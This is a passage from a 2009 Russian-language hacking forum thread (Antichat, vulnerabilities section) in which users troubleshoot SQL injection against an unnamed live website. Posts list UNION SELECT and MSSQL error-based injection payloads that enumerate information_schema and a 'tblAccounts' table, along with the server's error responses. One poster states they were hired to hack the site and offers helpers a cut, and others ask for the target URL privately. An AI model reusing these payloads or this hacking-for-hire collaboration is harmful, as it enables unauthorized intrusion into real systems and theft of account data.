ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4801  
Старый 20.01.2009, 18:04
Аватар для j0ker13
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

2z00MAN
Цитата:
попробуй так -1+union+select+1,2,3,4,5,6,7,version(),9+from+VGB_ USER+limit+1,1+--+
тоже нет результатов((
2big_BRAT
Цитата:
-1+union+select%201,2,3,4,5,6,7,concat_ws(0x3a,tabl e_schema,table_name,column_name%20),9%20from%20inf ormation_schema.columns%20where%20column_name%20li ke%200x70617373
тоже пусто(((
 
Ответить с цитированием

  #4802  
Старый 20.01.2009, 18:19
Аватар для big_BRAT
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию

то что я показал это пример, и на твоём конечно может не сработать, лучше брось ссылку, так будет быстрее и нагляднее
 
Ответить с цитированием

  #4803  
Старый 20.01.2009, 18:23
Аватар для mak-shapova
mak-shapova
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148

Репутация: 13
По умолчанию

R1dex
таблицы я уже вывел

Цитата:
(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name='tblAccounts')--
Incorrect syntax near '''.

(SELECT+TOP+1+COLUMN_NAME+FROM+information_schema. columns+where+table_name=0x74626C4163636F756E7473)--
An expression of non-boolean type specified in a context where a condition is expected, near ')'.
 
Ответить с цитированием

  #4804  
Старый 20.01.2009, 18:29
Аватар для groundhog
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

покажи ссыль, мне кажется у тебя так с синтаксисом что-то не то получается...
 
Ответить с цитированием

  #4805  
Старый 20.01.2009, 18:34
Аватар для mak-shapova
mak-shapova
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148

Репутация: 13
По умолчанию

без ссылки никак?
мне просто этот сайт взломать заказали
а я первый раз с такой хней встречаюсь, до этого сайты c mssql уже ломал
так что с синтаксисом все ok
P.S: кто поможет, % получит! )
 
Ответить с цитированием

  #4806  
Старый 20.01.2009, 18:39
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

перед or поставь '
 
Ответить с цитированием

  #4807  
Старый 20.01.2009, 18:43
Аватар для mak-shapova
mak-shapova
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148

Репутация: 13
По умолчанию

ты мне? где ты в моем запросе or видел? )
 
Ответить с цитированием

  #4808  
Старый 20.01.2009, 18:44
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema. columns+where+table_name=0x74626C4163636F756E7473)--

Он про это.
 
Ответить с цитированием

  #4809  
Старый 20.01.2009, 18:48
Аватар для mak-shapova
mak-shapova
Новичок
Регистрация: 11.01.2009
Сообщений: 15
Провел на форуме:
8148

Репутация: 13
По умолчанию

Не надо из меня уж совсем то дурака делать, я же говорю ломал уже базы mssql
пробывал я все это уже
Цитата:
1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema.columns+where+table_name='tblAccounts')--
Incorrect syntax near '''.

1'+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+information _schema.columns+where+table_name=0x74626C4163636F7 56E7473)--
Incorrect syntax near '''.
 
Ответить с цитированием

  #4810  
Старый 20.01.2009, 18:56
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Не надо из меня уж совсем то дурака делать, я же говорю ломал уже базы mssql
Мы по твоему кто? Экстрасенсы? Мы не можем знать, делал ты так или нет. Если бы кинул ссылку - все было бы гораздо проще.

А то знаешь, как бывает... Помогаешь человеку сделать вывод таблиц из information_schema, и после долгих дискуссий он тебе кидает в личку ссылку, смотришь version()...

ЗЫ: Кинь ссылку в личку.

Последний раз редактировалось R1dex; 20.01.2009 в 18:59..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ